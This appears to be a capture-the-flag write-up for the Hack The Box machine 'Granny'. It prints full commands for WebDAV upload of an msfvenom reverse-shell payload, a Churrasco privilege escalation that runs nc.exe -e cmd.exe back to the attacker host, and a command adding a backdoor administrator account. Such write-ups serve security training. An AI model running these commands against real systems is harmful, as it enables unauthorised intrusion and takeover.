Granny HTB
Enumeration
We use nmap for enumeration
sudo nmap -p- -A -T4 -O 10.10.10.15which gives
We find that a website is hosted:

We used dirbuster and found some hidden directories but they are empty

Exploitation
Non-metasploit
WE find that certain risky requests are permitted using davtest

Only text and html files are executable so we generate our payload to .aspx format and rename it to .txt using
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.25 LPORT=1234 -f aspx >reverse.aspxandmv reverse.aspx reverse.txt
Then we use cadaver to start a dav session using
cadaver 10.10.10.15and use a put request to upload our reverse.txt file then rename it to reverse.aspx using move
we visit html://10.10.10.15/reverse.aspx with netcat listening where we get a shell

We used the churrasco exploit from https://github.com/Re4son/Churrasco and nc.exe file by uploading in the same manner and executing
churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe 10.10.14.25 4444 -e cmd.exe"and listening on netcat usingnc -nlvp 4444
can also run
churrasco.exe -d "net user hacker hacker /add && net localgroup Administrators hacker /add"We get a root shell:

Metasploit
start metasploit and search for IIS exploits, find one and execute to get a meterpreter shell:

using ps to list processes:

We migrate to process 1964 for accessing the user
We use exploit_suggester and exploit and get a shell. As all this is pretty self explanatory we wont go into detail.
Last updated
Was this helpful?